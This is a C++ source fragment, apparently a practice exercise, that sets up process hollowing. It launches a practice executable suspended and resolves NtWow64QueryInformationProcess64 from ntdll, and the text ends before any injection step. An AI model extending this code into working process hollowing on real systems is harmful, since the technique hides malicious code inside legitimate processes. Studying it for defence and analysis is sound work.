// Hand-written prototype for the ntdll export "NtWow64QueryInformationProcess64",
// which main() looks up at run time with GetProcAddress rather than linking
// against a public SDK header. NOTE(review): the parameter layout below is taken
// on trust from this typedef; confirm it against the Windows build in use before
// relying on ReturnLength or the UINT32 width of the class/length arguments.
typedef NTSTATUS(WINAPI* pfnNtWow64QueryInformationProcess64)
(HANDLE ProcessHandle, UINT32 ProcessInformationClass,
PVOID ProcessInformation, UINT32 ProcessInformationLength,
UINT32* ReturnLength);
// Resolved function pointer. Zero-initialized as a global, so it stays NULL until
// main() assigns it from GetProcAddress; main() shows a MessageBox and returns
// if that lookup fails.
pfnNtWow64QueryInformationProcess64 gNtQueryInformationProcess64;
// Image name passed to CreateProcessW as lpApplicationName (lpCommandLine is
// NULL). No directory is given, so which file is launched depends on how
// CreateProcessW resolves a relative lpApplicationName (the SDK documents this as
// relative to the current directory). A commented-out 32-bit variant of this
// name sits inside main().
wchar_t pName[] = { L"1-64bit-practiceApp.exe" };
int main()
{
//create destination process - this is the process to be hollowed out
LPSTARTUPINFO si = new STARTUPINFO();
LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION(); // 32-64
DWORD returnLength = 0;
//wchar_t pName[] = { L"1-32bit-practiceApp.exe"}; //LPTSTR name = _tcsdup(TEXT("C:\\Windows\\Notepad.exe"));
if (!CreateProcessW(pName, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi))
{
MessageBox(NULL, L"failed to create process", L"error", MB_OK | MB_TOPMOST);
return 0;
}
HANDLE destProcess = pi->hProcess;
//dynamic linking of ntdll.dll
/*HMODULE hNtDll = LoadLibrary(L"C:\\Users\\bhara\\Desktop\\ntdll.dll");
if (hNtDll == NULL)
{
MessageBox(NULL, L"failed to load ntdll.dll", L"error", MB_OK | MB_TOPMOST);
return 0;
}*/
HMODULE NtdllModule = GetModuleHandle(L"ntdll.dll");
if (NtdllModule == NULL)
{
MessageBox(NULL, L"failed to load ntdll.dll", L"error", MB_OK | MB_TOPMOST);
return 0;
}
gNtQueryInformationProcess64 = (pfnNtWow64QueryInformationProcess64)GetProcAddress(NtdllModule, "NtWow64QueryInformationProcess64");
/*gNtQueryInformationProcess64 = (pfnNtWow64QueryInformationProcess64)GetProcAddress(hNtDll, "NtWow64QueryInformationProcess64"); */ //for 64 bit - NtWow64QueryInformationProcess64(). 32 bit- NtQueryInformationProcess
if (gNtQueryInformationProcess64 == NULL)
{
MessageBox(NULL, L"failed to get procaddress for NtQueryInformationProcess", L"error", MB_OK | MB_TOPMOST);
return 0;
}